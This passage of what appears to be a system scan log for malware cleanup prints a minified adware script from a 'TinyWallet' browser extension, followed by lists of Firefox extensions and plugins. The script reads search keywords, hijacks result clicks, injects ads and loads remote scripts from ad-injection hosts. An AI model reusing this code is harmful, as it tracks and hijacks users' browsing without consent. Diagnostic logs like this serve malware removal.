a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f= this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"== navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href: \"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src=b.pixelHost+\"?hid=4273800016501002566&eid=1089&pid=11214&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=CA&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+ b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()}, !1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&& (b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}}, infospace:{hrefSelector:\".resultTitle\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://search.infospace.com/search/*\"],src_for_keyword:\"#topSearchTextBox\",validate:function(){b.utils.ping(\"validate2\");return!0}},wow:{hrefSelector:\".find\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://www.wow.com/search?*\"],src_for_keyword:\"#csbquery1\",validate:function(){b.utils.ping(\"validate2\");return!0}},duckduckgo:{hrefSelector:\".result__a\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://duckduckgo.com/?q=*\"],src_for_keyword:\"#search_form_input\", validate:function(){b.utils.ping(\"validate2\");return!0}},contenko:{hrefSelector:\"#title\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://contenko.com/#/?q=*\"],src_for_keyword:\"#searchBar input[type='text']\",validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\", urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"== a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\", tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0], !1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\", validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}},superpages:{unique_search_divs:\"1\",urls:[\"http://yellowpages.superpages.com/listings.jsp?*\"],src_for_keyword:\"input[type='text']#what\", validate:function(){return!0}},yelp:{unique_search_divs:\"1\",urls:[\"http://www.yelp.com/search?find_desc=*\"],src_for_keyword:\"input#find_desc\",validate:function(){b.num_of_items_in_one=1;return!0}},yellowpages:{unique_search_divs:\"1\",urls:[\"http://www.yellowpages.com/search?search_terms=*\"],src_for_keyword:\"input[type='text']#query\",validate:function(){return!0}},info:{unique_search_divs:\"1\",urls:[\"http://www.info.com/search?*\"],src_for_keyword:\"input[type='text']#qkw0\",validate:function(){return!0}}, webcrawler:{unique_search_divs:\"1\",urls:[\"http://www.webcrawler.com/search/web?*\"],src_for_keyword:\"input[type='text']#topSearchTextBox\",validate:function(){return!0}},webssearches:{unique_search_divs:\"1\",urls:[\"http://search.webssearches.com/search/web?*\",\"http://istart.webssearches.com/web/?q=*\",\"http://istart.webssearches.com/web?q=*\"],src_for_keyword:[\"input[type='search']#topSearchTextBox\",\"input[type='text']#q\"],validate:function(){b.num_of_items_in_one=2;return!0}},mywebsearch:{unique_search_divs:\"1\", urls:[\"http://search.mywebsearch.com/mywebsearch/*\"],src_for_keyword:[\"input#q\"],validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e); g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b= 0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f= b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"== a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1, 1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)\"string\"===typeof a&&(a=a.replace(/\\\"/g,'\\\\\"'));return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&& (c=b.escape_chars_for_json©);a=JSON.stringify(a);d=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(var e=0;e<d.length;e++)a=a.replace(RegExp(\"\\\\[##\"+d[e].replace+\"##\\\\]\",\"g\"),d[e][\"with\"]);try{return\"undefined\"!==typeof c.pxl&&\"\"!==c.pxl&&b.utils.sendPixels(c.pxl),JSON.parse(a)}catch(f){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling): a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault? b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var n=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a);(function(a,c){c&&c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(var e=0;e<b.num_of_items_in_one&&0!=c.length;e++){var f=b.get_item_json(a,c[0]);try{b.insert_point.children.push(f)}catch(g){b.insert_point= d,b.insert_point.children.push(f)}\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()}};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(n);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g= 0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;n=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom);if(!c.match(/\\[##eid##\\]/))return a;c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse©;return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&& b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node=b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)}, !1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a;if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if©for(var d=0;d<c.length;d++)b.events.add(\"click\",function(){try{var b=a(this)}catch©{}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl, b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href, b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(), !1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]); b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+ \"&hid=4273800016501002566&eid=1089&pid=11214&prid=186\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){\"\"!= a&&(window.__yael_res=JSON.parse(a),window.__yael_res.config.targets.header.num_of_items_in_one&&(b.num_of_items_in_one=window.__yael_res.config.targets.header.num_of_items_in_one),\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search()))})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1, b.inputElement,!1)}};;new function(){if(!(document.getElementById(\"sdjksjsksjdskjd__0\")||window.self!=window.top||-1<location.host.indexOf(\"google.com\")||-1<location.host.indexOf(\"bing.com\")||-1<location.host.indexOf(\"yahoo.com\"))){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.setAttribute(\"id\",\"sdjksjsksjdskjd__0\");a.src=\"//cdncache-a.akamaihd.net/loaders/1750/l.js?aoi=1311798366&pid=1750&zoneid=13702660&ext=TinyWallet&systemid=4273800016501002566&ext=TinyWallet\";document.getElementsByTagName(\"head\")[0].appendChild(a)}};;new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=1089_11214&hid=4273800016501002566&bname=TinyWallet\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=1089_11214&hid=4273800016501002566&bname=TinyWallet\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1748/l.js?aoi=1311798366&pid=1748&zoneid=13702660&ext=TinyWallet&systemid=4273800016501002566&ext=TinyWallet\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1749/l.js?aoi=1311798366&pid=1749&zoneid=13702660&ext=TinyWallet&systemid=4273800016501002566&ext=TinyWallet\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;try{new function(){if(null==document.getElementById(\"id_ad5cbe0b719874f1\")&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"http://istatic.datafastguru.info/fo/min/wpgb.js?bname=TinyWallet&subid=1089_11214\";a.setAttribute(\"id\",\"id_ad5cbe0b719874f1\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;(function(){if(!document.getElementById(\"qwejkhjkshdfs_4\")&&window.self==window.top){var a=document.createElement(\"script\");a.id=\"inj_grazit_script_starter\";a.type=\"text/javascript\";a.src=\"//ext1.engageya.com/widget/inject_spark/inj_sprk_starter.js?pid=LTEsMTQyNTU5LDk0NjA4LDU0OTcx&subid=1089_11214&appname=TinyWallet\";a.setAttribute(\"id\",\"qwejkhjkshdfs_4\");document.getElementsByTagName(\"head\")[0].appendChild(a)}})();;try{new function() {if (!document.getElementById(\"sdfgdfg43iddfhgfs43af\") && window.self == window.top && document.getElementsByTagName(\"body\").length ) {var a = document.createElement(\"script\");a.setAttribute(\"id\", \"sdfgdfg43iddfhgfs43af\");a.src = \"https://www.tr553.com/InterYield/bindevent.do?e=click&affiliate=wpop&subid=1089_11214&ecpm=0&debug=false&snoozeMinutes=3&adCountIntervalHours=24&maxAdCountsPerInterval=3&attributionTitle=TinyWallet&endpoint=https%3A%2F%2Fwww.tr553.com\";document.getElementsByTagName(\"body\")[0].appendChild(a)}};}catch(e){}\r\n})();}catch(e){}");
FF - prefs.js..extensions.enabledAddons: 2020Player_IKEA%402020Technologies.com:5.0.94.1
FF - prefs.js..extensions.enabledAddons: %7Bab91efd4-6975-4081-8552-1b3922ed79e2%7D:1.0.28.1
FF - prefs.js..extensions.enabledAddons: %7B6e7f6f9f-8ce6-4611-add2-05f0f7049ee6%7D:1.10.0.1
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:34.0.5
 
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_13_0_0_206.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect_x86_64: C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_206.dll ()
FF - HKLM\Software\MozillaPlugins\@alibaba.com/nptrademanager;version=1.0: C:\Program Files (x86)\TradeManager\nptrademanager.dll ( )
FF - HKLM\Software\MozillaPlugins\@alibaba.com/npwangwang;version=1.0: C:\Program Files (x86)\TradeManager\npwangwang.dll ( )
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf: C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf: C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@Google.com/GoogleEarthPlugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@logitech.com/HarmonyRemote,version=1.0.0: C:\Program Files (x86)\Logitech\Harmony Remote Driver\NprtHarmonyPlugin.dll (Logitech Inc.)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3555.0308: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@oberon-media.com/ONCAdapter: C:\Program Files (x86)\Common Files\Oberon Media\NCAdapter\1.0.0.14\npapicomadapter.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll File not found
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect: C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll (Adobe Systems)
FF - HKCU\Software\MozillaPlugins\@alibaba.com/npAliSSOLogin;version=1.0: C:\Program Files (x86)\TradeManager\npAliSSOLogin.dll (Alibaba software (Shanghai) Corporation.)
FF - HKCU\Software\MozillaPlugins\@alibaba.com/nptrademanager;version=1.0: "C:\Program Files (x86)\TradeManager\nptrademanager.dll" File not found
FF - HKCU\Software\MozillaPlugins\@alibaba.com/npwangwang;version=1.0: "C:\Program Files (x86)\TradeManager\npwangwang.dll" File not found
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2012/03/13 07:20:59 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{6e7f6f9f-8ce6-4611-add2-05f0f7049ee6}: C:\Program Files (x86)\Mozilla Firefox\extensions\{6e7f6f9f-8ce6-4611-add2-05f0f7049ee6}
